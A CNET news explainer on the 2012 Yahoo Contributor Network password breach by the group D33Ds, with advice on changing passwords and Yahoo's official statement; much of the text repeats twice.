Yahoo is the latest online service to to confirm the disclosure of passwords belonging to tens of thousands of its users. Here's what we know -- and, more important, what you need to do to protect yourself.
The Yahoo Contributor Network page
(Credit: Screenshot by David Hamilton/CNET)
Yahoo has just become the latest big online service to suffer a major password breach. While the number of affected users is far smaller than in the last big exposure -- that would be the password hack at LinkedIn last month, which exposed 6.5 million user passwords -- the attack is a big black eye for Yahoo and a potential hazard to the 450,000 or so people whose login information is now flapping in the breeze.
So here is CNET's quick guide to the Yahoo password fumble and what you need to do.
What, exactly, went wrong?
A hacker collective calling itself D33Ds Co. publicly posted more than 450,000 login credentials -- i.e., paired usernames and passwords -- obtained from Yahoo's "Contributor Network" site. In that data dump, the hackers described their attack as a "union-based SQL injection," which is effectively a way of tricking the database on a poorly secured site into divulging private information.
Which, in this case, yielded a treasure trove of usernames and passwords, apparently all stored in plain text -- itself a fairly significant security failure on Yahoo's part. Passwords are usually encrypted, or at least masked in a process called "hashing," to prevent exactly this sort of mass disclosure.
The file of usernames (predominantly email addresses) and passwords, originally published on a public Web site, has since been widely distributed via BitTorrent and various file lockers across the Internet. In other words, this cat is very firmly out of the bag.
For what it's worth, the D33Ds hackers claim they released the information to point up lax security at Yahoo, not for malicious purposes. That said, these possibly sensitive passwords are now available to the maliciously minded across the world. So it's better-safe-than-sorry time.
I've never heard of the Yahoo Contributor Network. Am I really in any danger here?
Maybe, maybe not. The Yahoo Contributor Network is, to be honest, sort of obscure. It was originally an independent site called Associated Content -- a content farm that paid users a pittance to publish their written submissions, plus a bonus for any traffic generated. (Such "low-cost content," as it's known in the biz, is basically a lure used to draw search traffic to ads displayed nearby.) Yahoo acquired Associated Content two years ago, reportedly for more than $100 million.
It's not immediately clear whose login credentials have been exposed. Yahoo has formally confirmed the password breach, but the online media company didn't elaborate on their origin. (See Yahoo's official statement below.) It does, however, seem highly likely that the exposed passwords mostly belong to Yahoo's contributors themselves -- i.e., the individuals who wrote material for either Associated Content or Yahoo.
One big hint: Quite a few of the email addresses and passwords contain the word "writer." I.e., usernames such as "[email protected]" and "[email protected]," and occasionally aspirational passwords such as "paidwriter" and "richwriter." Not to mention umpteen-jillion instances of "writer" as a password.
So if I've never contributed to the Yahoo Contributor Network, I'm safe, right?
Possibly -- but you never know.
In its official statement, Yahoo insists that the "file" the hackers "compromised" was an "older" one. (This statement itself is kind of suspect, since the hackers probably didn't just steal a particular file. More likely, they repeatedly poked a Yahoo database until it started spitting out login credentials. But set that aside for now.) The company claims that fewer than five percent of the Yahoo passwords disclosed are currently valid.
Which all sounds reassuring enough, except that no one with a Yahoo ID has any way to know whether it might have been compromised elsewhere within the site. And, of course, you won't know until either a public-spirited group like D33Ds decides to publish your password -- or you get hacked in a more malicious fashion. (You are free to believe that the hack of the Yahoo contributor network was an isolated incident, and maybe it was. But maybe it wasn't.)
I get the sense you're leading up to something. Go on.
Yahoo's statement, however, is silent on the non-Yahoo ID credentials revealed in the D33Ds hack. The published file also contains a huge number what appear to be login credentials for many other email services, including Gmail (106,873 instances), Hotmail (55,148), AOL (25,521) and any number of ISPs (Comcast, Cox, Mindspring, etc.).
Presumably the pre-merger Associated Content allowed users to use email addresses as their usernames, and Yahoo never forced users to change their logins to Yahoo ID. These days, in fact, Yahoo still allows people to sign into the contributor network via Google or Facebook IDs in addition to their Yahoo accounts.
All of which suggests that close to 300,000 people could have just seen their personal, non-Yahoo email accounts compromised as well as their Yahoo accounts. They've effectively just dropped a trail of breadcrumbs to their personal email, since they've identified the service, their username and (assuming general laziness on the part of Internet users, which is usually a safe bet) their password.
OK, so how do I know if I'm at risk?
To be on the safe side, if you have a Yahoo ID, you should assume it's no longer secure and change it. (I just did, and I've never visited the Yahoo Voices site until today.) You should also change other passwords if:
If you're one of those folks who likes to live dangerously, you can always call up the file of cracked credentials (just Google "yahoo-disclosure.txt") and see if your email or Yahoo ID is on there. This may or may not prove anything, and of course there's no way to know if your password might have been cracked and displayed elsewhere -- at least until it's too late.
So do the smart thing. Change your Yahoo ID password and any other passwords associated with email addresses listed in this disclosure.
Where is Yahoo's official statement on all this?
Glad you asked. It's right here:
(Credit: Screenshot by David Hamilton/CNET)
Yahoo has just become the latest big online service to suffer a major password breach. While the number of affected users is far smaller than in the last big exposure -- that would be the password hack at LinkedIn last month, which exposed 6.5 million user passwords -- the attack is a big black eye for Yahoo and a potential hazard to the 450,000 or so people whose login information is now flapping in the breeze.
So here is CNET's quick guide to the Yahoo password fumble and what you need to do.
What, exactly, went wrong?
A hacker collective calling itself D33Ds Co. publicly posted more than 450,000 login credentials -- i.e., paired usernames and passwords -- obtained from Yahoo's "Contributor Network" site. In that data dump, the hackers described their attack as a "union-based SQL injection," which is effectively a way of tricking the database on a poorly secured site into divulging private information.
Which, in this case, yielded a treasure trove of usernames and passwords, apparently all stored in plain text -- itself a fairly significant security failure on Yahoo's part. Passwords are usually encrypted, or at least masked in a process called "hashing," to prevent exactly this sort of mass disclosure.
The file of usernames (predominantly email addresses) and passwords, originally published on a public Web site, has since been widely distributed via BitTorrent and various file lockers across the Internet. In other words, this cat is very firmly out of the bag.
For what it's worth, the D33Ds hackers claim they released the information to point up lax security at Yahoo, not for malicious purposes. That said, these possibly sensitive passwords are now available to the maliciously minded across the world. So it's better-safe-than-sorry time.
I've never heard of the Yahoo Contributor Network. Am I really in any danger here?
Maybe, maybe not. The Yahoo Contributor Network is, to be honest, sort of obscure. It was originally an independent site called Associated Content -- a content farm that paid users a pittance to publish their written submissions, plus a bonus for any traffic generated. (Such "low-cost content," as it's known in the biz, is basically a lure used to draw search traffic to ads displayed nearby.) Yahoo acquired Associated Content two years ago, reportedly for more than $100 million.
It's not immediately clear whose login credentials have been exposed. Yahoo has formally confirmed the password breach, but the online media company didn't elaborate on their origin. (See Yahoo's official statement below.) It does, however, seem highly likely that the exposed passwords mostly belong to Yahoo's contributors themselves -- i.e., the individuals who wrote material for either Associated Content or Yahoo.
One big hint: Quite a few of the email addresses and passwords contain the word "writer." I.e., usernames such as "[email protected]" and "[email protected]," and occasionally aspirational passwords such as "paidwriter" and "richwriter." Not to mention umpteen-jillion instances of "writer" as a password.
So if I've never contributed to the Yahoo Contributor Network, I'm safe, right?
Possibly -- but you never know.
In its official statement, Yahoo insists that the "file" the hackers "compromised" was an "older" one. (This statement itself is kind of suspect, since the hackers probably didn't just steal a particular file. More likely, they repeatedly poked a Yahoo database until it started spitting out login credentials. But set that aside for now.) The company claims that fewer than five percent of the Yahoo passwords disclosed are currently valid.
Which all sounds reassuring enough, except that no one with a Yahoo ID has any way to know whether it might have been compromised elsewhere within the site. And, of course, you won't know until either a public-spirited group like D33Ds decides to publish your password -- or you get hacked in a more malicious fashion. (You are free to believe that the hack of the Yahoo contributor network was an isolated incident, and maybe it was. But maybe it wasn't.)
I get the sense you're leading up to something. Go on.
Yahoo's statement, however, is silent on the non-Yahoo ID credentials revealed in the D33Ds hack. The published file also contains a huge number what appear to be login credentials for many other email services, including Gmail (106,873 instances), Hotmail (55,148), AOL (25,521) and any number of ISPs (Comcast, Cox, Mindspring, etc.).
Presumably the pre-merger Associated Content allowed users to use email addresses as their usernames, and Yahoo never forced users to change their logins to Yahoo ID. These days, in fact, Yahoo still allows people to sign into the contributor network via Google or Facebook IDs in addition to their Yahoo accounts.
All of which suggests that close to 300,000 people could have just seen their personal, non-Yahoo email accounts compromised as well as their Yahoo accounts. They've effectively just dropped a trail of breadcrumbs to their personal email, since they've identified the service, their username and (assuming general laziness on the part of Internet users, which is usually a safe bet) their password.
OK, so how do I know if I'm at risk?
To be on the safe side, if you have a Yahoo ID, you should assume it's no longer secure and change it. (I just did, and I've never visited the Yahoo Voices site until today.) You should also change other passwords if:
- You've used the same password for any other major service -- particularly for sensitive accounts such as banking, investing, or email.
- You've ever signed into Yahoo or Associated Content with a non-Yahoo email address.
If you're one of those folks who likes to live dangerously, you can always call up the file of cracked credentials (just Google "yahoo-disclosure.txt") and see if your email or Yahoo ID is on there. This may or may not prove anything, and of course there's no way to know if your password might have been cracked and displayed elsewhere -- at least until it's too late.
So do the smart thing. Change your Yahoo ID password and any other passwords associated with email addresses listed in this disclosure.
Where is Yahoo's official statement on all this?
Glad you asked. It's right here:
At Yahoo! we take security very seriously and invest heavily in protective measures to ensure the security of our users and their data across all our products. We confirm that an older file from Yahoo! Contributor Network (previously Associated Content) containing approximately 450,000 Yahoo! and other company users names and passwords was compromised yesterday, July 11. Of these, less than 5% of the Yahoo! accounts had valid passwords. We are taking immediate action by fixing the vulnerability that led to the disclosure of this data, changing the passwords of the affected Yahoo! users and notifying the companies whose users accounts may have been compromised. We apologize to all affected users. We encourage users to change their passwords on a regular basis and also familiarize themselves with our online safety tips at security.yahoo.com.